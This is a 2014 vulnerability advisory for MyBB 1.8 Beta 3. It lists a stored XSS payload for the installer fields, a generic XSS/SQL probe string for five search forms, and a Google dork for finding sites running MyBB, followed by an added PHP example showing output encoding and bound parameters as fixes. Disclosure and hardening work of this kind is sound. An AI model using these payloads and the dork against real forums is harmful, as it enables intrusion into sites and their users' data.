
MyBB 1.8 Beta 3 - Cross Site Scripting & SQL Injection

Author: DemoLisH, Published: 22-08-2014
# Title: MyBB 1.8 Beta 3 - Cross Site Scripting & SQL Injection
# Google Dork: intext:"Powered By MyBB"
# Date: 15.08.2014
# Author: DemoLisH
# Vendor Homepage: http://www.mybb.com/
# Software Link: http://www.mybb.com/downloads
# Version: 1.8 - Beta 3
# Contact: onur@b3yaz.org

***************************************************

a) Cross Site Scripting in Installation Wizard ( Board Configuration )

Fill the Forum Name, Website Name and Website URL fields with your code, for example: "><script>alert('DemoLisH')</script>
localhost/install/index.php

Now let's finish setup and go to the homepage.



b) SQL Injection in Private Messages ( User CP )

Go to -> Inbox, for example:
localhost/private.php

Enter the following string in the Keywords search field:
<foo> <h1> <script> alert (bar) () ; // ' " > < prompt \x41 %42 constructor onload



c) SQL Injection in Showthread

Go to -> Show Thread, for example:
localhost/showthread.php?tid=1

Enter the following string in the Keywords search field:
<foo> <h1> <script> alert (bar) () ; // ' " > < prompt \x41 %42 constructor onload



d) SQL Injection in Search

Go to -> Search, for example:
localhost/search.php

Enter the following string in the Keywords search field:
<foo> <h1> <script> alert (bar) () ; // ' " > < prompt \x41 %42 constructor onload



e) SQL Injection in Help Documents

Go to -> Help Documents, for example:
localhost/misc.php?action=help

Enter the following string in the Keywords search field:
<foo> <h1> <script> alert (bar) () ; // ' " > < prompt \x41 %42 constructor onload



f) SQL Injection in Forum Display

Go to -> Forum Display, for example:
localhost/forumdisplay.php?fid=2

Enter the following string in the "Search this Forum" field:
<foo> <h1> <script> alert (bar) () ; // ' " > < prompt \x41 %42 constructor onload
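
For anyone patching or reviewing code against findings like a) to f), the following added example (not part of the original advisory and not MyBB code) feeds the two strings above through a weak and a hardened version of each sink: a stored setting echoed into HTML, and a search keyword placed into a SQL LIKE clause. The table, column and function names are hypothetical, and it assumes PHP with the pdo_sqlite extension.

```php
<?php
declare(strict_types=1);
// Added illustration, not MyBB code: table, column and function names are hypothetical.
// Constructed inputs: the two strings the advisory submits.
$boardName = '"><script>alert(\'DemoLisH\')</script>';
$keywords  = '<foo> <h1> <script> alert (bar) () ; // \' " > < prompt \x41 %42 constructor onload';

// Weak: a stored setting is echoed into an attribute as-is.
function renderTitleRaw(string $name): string {
    return '<input name="bbname" value="' . $name . '">';
}
// Hardened: encode for the HTML attribute context at output time.
function renderTitleEncoded(string $name): string {
    return '<input name="bbname" value="'
        . htmlspecialchars($name, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8') . '">';
}

$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE posts (pid INTEGER PRIMARY KEY, message TEXT)');
$db->exec("INSERT INTO posts (message) VALUES ('welcome to the board')");

// Weak: keywords are concatenated into the statement text.
function searchConcat(PDO $db, string $kw): string {
    try {
        $sql = "SELECT pid FROM posts WHERE message LIKE '%" . $kw . "%'";
        return count($db->query($sql)->fetchAll()) . ' row(s)';
    } catch (PDOException $e) {
        // The quote in the input ended the string literal early.
        return 'SQL error: ' . $e->getMessage();
    }
}
// Hardened: keywords are bound as data; LIKE wildcards in the input are escaped.
function searchBound(PDO $db, string $kw): string {
    $stmt = $db->prepare("SELECT pid FROM posts WHERE message LIKE ? ESCAPE '!'");
    $like = '%' . str_replace(['!', '%', '_'], ['!!', '!%', '!_'], $kw) . '%';
    $stmt->execute([$like]);
    return count($stmt->fetchAll()) . ' row(s)';
}

echo renderTitleRaw($boardName), "\n";      // markup breaks out of the attribute
echo renderTitleEncoded($boardName), "\n";  // same input rendered as inert text
echo searchConcat($db, $keywords), "\n";    // input alters the statement
echo searchBound($db, $keywords), "\n";     // input treated as a plain search term
```

A database error or broken markup in response to these strings is the signal the advisory relies on; the hardened functions return a normal page and an empty result set for the same input.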


***************************************************

[~#~] Thanks To:
Mugair, X-X-X, PoseidonKairos, DexmoD, Micky and all TurkeySecurity Members.
